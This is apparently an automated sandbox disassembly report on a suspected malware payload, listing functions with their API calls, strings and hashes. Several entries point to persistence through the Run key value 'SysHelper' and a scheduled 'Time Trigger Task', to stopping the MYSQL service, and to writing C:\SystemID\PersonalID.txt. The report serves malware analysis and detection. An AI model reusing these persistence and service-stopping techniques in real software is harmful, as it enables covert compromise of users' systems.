                                                                                                                            • _wcsstr.LIBCMT ref: 004B4A8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                            • API String ID: 2112994598-1672312481
                                                                                                                            • Opcode ID: def15fdeab4102e5c71a1adbd9b4d28d60df5fdc3bdb23aa13bf263bfcc715e6
                                                                                                                            • Instruction ID: eb447ca3da45c3805525e92da6640c3a47436316e7481d1e59ba4b6d3c247b8b
                                                                                                                            • Opcode Fuzzy Hash: def15fdeab4102e5c71a1adbd9b4d28d60df5fdc3bdb23aa13bf263bfcc715e6
                                                                                                                            • Instruction Fuzzy Hash: 57313931A401089BDB20DBB9EC466EE77B8EF98320F10061BE815D32D2EB3499159B64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B4AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,004B4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,004B480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,004B1D37,00000000,0046CDAE,00000001,00000001), ref: 004B4AFA
                                                                                                                            • GetFileType.KERNEL32(00000000,?,004B1D37,00000000,0046CDAE,00000001,00000001), ref: 004B4B05
                                                                                                                            • __vfwprintf_p.LIBCMT ref: 004B4B27
                                                                                                                              • Part of subcall function 0048BDCC: _vfprintf_helper.LIBCMT ref: 0048BDDF
                                                                                                                            • vswprintf.LIBCMT ref: 004B4B5D
                                                                                                                            • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 004B4B7E
                                                                                                                            • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 004B4BA2
                                                                                                                            • DeregisterEventSource.ADVAPI32(00000000), ref: 004B4BA9
                                                                                                                            • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 004B4BD3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                            • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                            • API String ID: 277090408-1348657634
                                                                                                                            • Opcode ID: 1c0b9bc92b2df5103bb0e9b3929524a04e50226961d8e7772cba3f9066f4920d
                                                                                                                            • Instruction ID: 4e2bdff3829aa489a41b2a48ab9ab2279d0de42725087c09bcef62b72ae397aa
                                                                                                                            • Opcode Fuzzy Hash: 1c0b9bc92b2df5103bb0e9b3929524a04e50226961d8e7772cba3f9066f4920d
                                                                                                                            • Instruction Fuzzy Hash: E1219571648304ABE770A760CC4BFEF7B98AF98700F44481EF699861D1EBF894449767
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00472389
                                                                                                                            • _memset.LIBCMT ref: 004723B6
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004723DE
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004723E7
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 004723F4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004723FF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047240E
                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 00472422
                                                                                                                            Strings
                                                                                                                            • SysHelper, xrefs: 004723D6
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0047237F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                            • API String ID: 122392481-4165002228
                                                                                                                            • Opcode ID: 4d33f94a143495b812e8875840485addce7b16fcaabc54438496aed267abb08d
                                                                                                                            • Instruction ID: d683367246fdd22902d612250551eaca766244ee2758b057a6f1bdc7638c200e
                                                                                                                            • Opcode Fuzzy Hash: 4d33f94a143495b812e8875840485addce7b16fcaabc54438496aed267abb08d
                                                                                                                            • Instruction Fuzzy Hash: 3D115C7190020CABDF20DBA0DC49FEE7BBCBF05705F0045A5B509E2151DBB45A89AB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AF26C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF27F
                                                                                                                              • Part of subcall function 00490CFC: std::exception::_Copy_str.LIBCMT ref: 00490D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF294
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF2AD
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF2C2
                                                                                                                            • std::regex_error::regex_error.LIBCPMT ref: 004AF2D4
                                                                                                                              • Part of subcall function 004AEF74: std::exception::exception.LIBCMT ref: 004AEF8E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF2E2
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF2FB
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                            • String ID: bad function call$leS
                                                                                                                            • API String ID: 2464034642-3897984503
                                                                                                                            • Opcode ID: 58d96a165e4b1aa30d260988662588829391c18ca3d456cfb427b901a7a3f461
                                                                                                                            • Instruction ID: 5649ec8c1bbda7027ea540c0276f15566c6820ca005db5634286144776f8aebc
                                                                                                                            • Opcode Fuzzy Hash: 58d96a165e4b1aa30d260988662588829391c18ca3d456cfb427b901a7a3f461
                                                                                                                            • Instruction Fuzzy Hash: 8411DA74D4020DBBCF04EFA5C595CDDBFBCEA04348F40856ABD2597241EA74A3098B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00485B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1077091919-0
                                                                                                                            • Opcode ID: 96662ada36a76d1a7765d0a99e2749c91491bb01b930d3a9ee949e51e962e5a5
                                                                                                                            • Instruction ID: 209b44514e889423210cb079ee489640a4411a90adcc9db559617a25bdd110a5
                                                                                                                            • Opcode Fuzzy Hash: 96662ada36a76d1a7765d0a99e2749c91491bb01b930d3a9ee949e51e962e5a5
                                                                                                                            • Instruction Fuzzy Hash: 70412832404705AFDB11BFA5DC42B9E7BE0AF44318F20482FF904A6282DB7D5645DF19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00478000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: c771bd7d7ce1222d8b4af3ab698258f44f372902432810aa4f0bbb07d97d5a5e
                                                                                                                            • Instruction ID: 74d58e29b59375b18bba7abdcb903fb2842f0246db8b6843f5f5a445de9f1a38
                                                                                                                            • Opcode Fuzzy Hash: c771bd7d7ce1222d8b4af3ab698258f44f372902432810aa4f0bbb07d97d5a5e
                                                                                                                            • Instruction Fuzzy Hash: 2DC1AF71740209DFDB18CF0CC9889AE77A6EF84704B64C92EE859CB741DB34ED468B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046DAEB
                                                                                                                            • CoCreateInstance.OLE32(00534F6C,00000000,00000001,00534F3C,?,?,0052A948,000000FF), ref: 0046DB0B
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0046DBD6
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,0052A948,000000FF), ref: 0046DBE3
                                                                                                                            • _memset.LIBCMT ref: 0046DC38
                                                                                                                            • CoUninitialize.OLE32 ref: 0046DC92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                            • String ID: --Task$Comment$Time Trigger Task
                                                                                                                            • API String ID: 330603062-1376107329
                                                                                                                            • Opcode ID: 8d58a373d85fab5f3720afc941b8fe0bfb3d7495674d555e05e5ffc0d6b3d9be
                                                                                                                            • Instruction ID: e4a8e22be0aa4d1b6409904d715e5f9baa882aa64fe7f5a8b027dfe143aa83e7
                                                                                                                            • Opcode Fuzzy Hash: 8d58a373d85fab5f3720afc941b8fe0bfb3d7495674d555e05e5ffc0d6b3d9be
                                                                                                                            • Instruction Fuzzy Hash: 5251E470A40209AFDB00DF94CC89FAE7BB9FF49B05F108459F505AB291DB75A946CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00471A1D
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00471A32
                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 00471A46
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00471A5B
                                                                                                                            • Sleep.KERNEL32(?), ref: 00471A75
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00471A80
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00471A9E
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00471AA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                            • String ID: MYSQL
                                                                                                                            • API String ID: 2359367111-1651825290
                                                                                                                            • Opcode ID: 8dd393777ddf5d13771edb186755c5cbd996ce32e598fb3644e7335f1a20f09e
                                                                                                                            • Instruction ID: 2b2e498dfe0b8d0ac5423cfe01bc5fb2bff09120a51e7798f66acf16e4a08e91
                                                                                                                            • Opcode Fuzzy Hash: 8dd393777ddf5d13771edb186755c5cbd996ce32e598fb3644e7335f1a20f09e
                                                                                                                            • Instruction Fuzzy Hash: 6111A331A01205ABDB309BE89C4CFEF7BBCDF46751F040022FA04E3251D728D94ACAA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004C5480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004C54C8
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004C54D4
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004C54F7
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004C5503
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 004C5531
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 004C555B
                                                                                                                            • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004C55F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                            • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                            • API String ID: 1717984340-2085858615
                                                                                                                            • Opcode ID: 090d8a1cdac9228b32c331c7df3d06095599ff9dcd3cf2dd3fbde434471986b5
                                                                                                                            • Instruction ID: 281a51e7bb5641c9819d769f210f1132d404f80e63e8eee903daaf2aa54287fc
                                                                                                                            • Opcode Fuzzy Hash: 090d8a1cdac9228b32c331c7df3d06095599ff9dcd3cf2dd3fbde434471986b5
                                                                                                                            • Instruction Fuzzy Hash: 92514C75B40604BBEB206B658C03FBF7A69AF15714F40002FFE01BB2C2D6695905C7AA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00480FDD: __wfsopen.LIBCMT ref: 00480FE8
                                                                                                                            • _fgetws.LIBCMT ref: 0046C7BC
                                                                                                                            • _memmove.LIBCMT ref: 0046C89F
                                                                                                                            • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0046C94B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2864494435-54166481
                                                                                                                            • Opcode ID: 8a99dac3bac7011d09cb6a191c0cd3aca57e9e0ede86467ce370a77350a3cc5b
                                                                                                                            • Instruction ID: 7c1d9cbdc844d2066280f59721cb396b14e817b3c99122331cf76a8b439d4e7f
                                                                                                                            • Opcode Fuzzy Hash: 8a99dac3bac7011d09cb6a191c0cd3aca57e9e0ede86467ce370a77350a3cc5b
                                                                                                                            • Instruction Fuzzy Hash: FC9183B1D003199BDF20EFA5C9857AFB7B5BF04304F14052BE855A3241F779AA18CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0046F338
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0046F353
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                            • API String ID: 2574300362-2555811374
                                                                                                                            • Opcode ID: d6146b7b99574dbb0c79736fe57c41271408b9b60ca865d6f2ea8d983bcce9b2
                                                                                                                            • Instruction ID: 159db3e0fdd4b31f7a8eaf3284d49824f814c6c2a87dbf4b7ffd28ca26f40d36
                                                                                                                            • Opcode Fuzzy Hash: d6146b7b99574dbb0c79736fe57c41271408b9b60ca865d6f2ea8d983bcce9b2
